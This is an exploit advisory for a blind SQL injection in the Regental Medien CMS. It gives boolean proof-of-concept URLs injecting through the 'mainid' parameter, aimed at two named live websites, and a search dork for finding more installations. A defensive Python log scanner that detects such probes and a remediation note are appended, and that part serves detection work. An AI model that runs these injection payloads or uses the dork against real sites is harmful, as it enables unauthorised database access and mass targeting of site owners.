Regental Medien suffers from a remote blind SQL injection vulnerability.
[o] Regental Medien Blind SQL Injection Vulnerability
Software : Regental Medien
Vendor : https://www.regental-medien.de/
Author : NoGe
Home : https://antisecurity.org
[o] Vulnerable file
index.php
[o] Exploit
https://localhost/[path]/index.php?mainid=[SQL]
[o] Proof of Concept
https://demo15.rm-websystem.de/index.php?mainid=9+and+substring(@@version,1,1)=4 << TRUE
https://demo15.rm-websystem.de/index.php?mainid=9+and+substring(@@version,1,1)=5 << FALSE
https://www.innenstadterleben.de/index.php?mainid=30+and+substring(@@version,1,1)=4 << TRUE
https://www.innenstadterleben.de/index.php?mainid=30+and+substring(@@version,1,1)=5 << FALSE
[o] Dork
"powered by regental medien"
[o] Note
This is a private script.
All targets are on one IP address.
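
A defender-side check for the probes shown in the Proof of Concept, as an added example that is not part of the original advisory: it scans web access logs for `mainid` values that are not plain integers and reports clients whose injected requests received differing response sizes, the TRUE/FALSE page difference a blind injection relies on. The combined log format, the sample lines and the assumption that a legitimate `mainid` is always numeric are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:13:55:36 +0100] "GET /index.php?mainid=9 HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2024:13:55:40 +0100] "GET /index.php?mainid=9+and+substring(@@version,1,1)=4 HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2024:13:55:41 +0100] "GET /index.php?mainid=9+and+substring(@@version,1,1)=5 HTTP/1.1" 200 1033
198.51.100.2 - - [01/Jan/2024:13:56:02 +0100] "GET /index.php?mainid=30 HTTP/1.1" 200 4801
198.51.100.2 - - [01/Jan/2024:13:56:09 +0100] "GET /index.php?mainid=30%20AND%201=1 HTTP/1.1" 200 4801
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3}) (\d+|-)')
SQL_HINT_RE = re.compile(r"\b(and|or|union|select|substring|sleep)\b|@@|--|/\*", re.I)

def suspicious_mainid_requests(log_text):
    """Return (client, decoded mainid, reason, response size) for non-integer mainid values."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, _status, size = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("index.php"):
            continue
        # parse_qs decodes '+' and %XX, so encoded probes are normalised before matching.
        for value in parse_qs(parts.query, keep_blank_values=True).get("mainid", []):
            if re.fullmatch(r"[0-9]+", value):
                continue  # assumed legitimate form: a plain numeric id
            reason = "sql-syntax" if SQL_HINT_RE.search(value) else "non-numeric"
            findings.append((client, value, reason, size))
    return findings

def boolean_oracle_clients(findings):
    """Clients whose injected requests got differing response sizes (TRUE/FALSE pages)."""
    sizes = defaultdict(set)
    for client, _value, reason, size in findings:
        if reason == "sql-syntax":
            sizes[client].add(size)
    return sorted(c for c, s in sizes.items() if len(s) > 1)

if __name__ == "__main__":
    hits = suspicious_mainid_requests(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("boolean oracle observed for:", boolean_oracle_clients(hits))
```

A hit on this check is also the validation rule the application itself should enforce: reject any `mainid` that is not an integer and bind it as a query parameter instead of concatenating it into SQL.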